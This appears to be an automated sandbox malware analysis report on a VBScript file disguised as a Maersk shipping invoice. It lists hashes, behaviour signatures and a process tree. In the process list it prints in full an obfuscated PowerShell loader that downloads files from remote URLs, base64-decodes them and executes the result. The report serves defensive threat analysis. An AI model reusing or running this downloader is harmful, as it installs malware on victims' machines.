Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
02-07-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs
Resource
win10v2004-20240508-en
General
-
Target
Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs
-
Size
22KB
-
MD5
af8e905368962cfb4873c41a77b4515c
-
SHA1
577337de5d106e6b11225be7c362f33a8d5c0831
-
SHA256
bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
-
SHA512
8fca68d732a9db1a4a6d9b955a361a5bd37bdd7c994e9094b31799cc7c4c6448fc620d2bf8928532a261680c78e8e138f0b960d9fa630dfc0b4e51c7e756a9c2
-
SSDEEP
384:KlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwfEa+MCq22HX:6zSR022X/523S0e8xPPmra+Mq01N
Malware Config
Signatures
-
Blocklisted process makes network request 64 IoCs
Processes:
powershell.exeflow pid process 5 2672 powershell.exe 6 2672 powershell.exe 7 2672 powershell.exe 8 2672 powershell.exe 10 2672 powershell.exe 11 2672 powershell.exe 12 2672 powershell.exe 13 2672 powershell.exe 14 2672 powershell.exe 15 2672 powershell.exe 16 2672 powershell.exe 17 2672 powershell.exe 18 2672 powershell.exe 19 2672 powershell.exe 20 2672 powershell.exe 21 2672 powershell.exe 22 2672 powershell.exe 23 2672 powershell.exe 24 2672 powershell.exe 25 2672 powershell.exe 26 2672 powershell.exe 27 2672 powershell.exe 28 2672 powershell.exe 29 2672 powershell.exe 30 2672 powershell.exe 31 2672 powershell.exe 32 2672 powershell.exe 33 2672 powershell.exe 34 2672 powershell.exe 35 2672 powershell.exe 36 2672 powershell.exe 37 2672 powershell.exe 38 2672 powershell.exe 39 2672 powershell.exe 40 2672 powershell.exe 41 2672 powershell.exe 42 2672 powershell.exe 43 2672 powershell.exe 44 2672 powershell.exe 45 2672 powershell.exe 46 2672 powershell.exe 47 2672 powershell.exe 48 2672 powershell.exe 49 2672 powershell.exe 50 2672 powershell.exe 51 2672 powershell.exe 52 2672 powershell.exe 53 2672 powershell.exe 54 2672 powershell.exe 55 2672 powershell.exe 56 2672 powershell.exe 57 2672 powershell.exe 58 2672 powershell.exe 59 2672 powershell.exe 60 2672 powershell.exe 61 2672 powershell.exe 62 2672 powershell.exe 63 2672 powershell.exe 64 2672 powershell.exe 65 2672 powershell.exe 66 2672 powershell.exe 67 2672 powershell.exe 68 2672 powershell.exe 69 2672 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2672 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2548 wrote to memory of 2672 2548 WScript.exe powershell.exe PID 2548 wrote to memory of 2672 2548 WScript.exe powershell.exe PID 2548 wrote to memory of 2672 2548 WScript.exe powershell.exe PID 2672 wrote to memory of 2028 2672 powershell.exe cmd.exe PID 2672 wrote to memory of 2028 2672 powershell.exe cmd.exe PID 2672 wrote to memory of 2028 2672 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2672-4-0x000007FEF56BE000-0x000007FEF56BF000-memory.dmpFilesize
4KB
-
memory/2672-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmpFilesize
2.9MB
-
memory/2672-6-0x0000000001E80000-0x0000000001E88000-memory.dmpFilesize
32KB
-
memory/2672-7-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmpFilesize
9.6MB
-
memory/2672-8-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmpFilesize
9.6MB
-
memory/2672-9-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmpFilesize
9.6MB
-
memory/2672-10-0x000007FEF56BE000-0x000007FEF56BF000-memory.dmpFilesize
4KB
-
memory/2672-11-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmpFilesize
9.6MB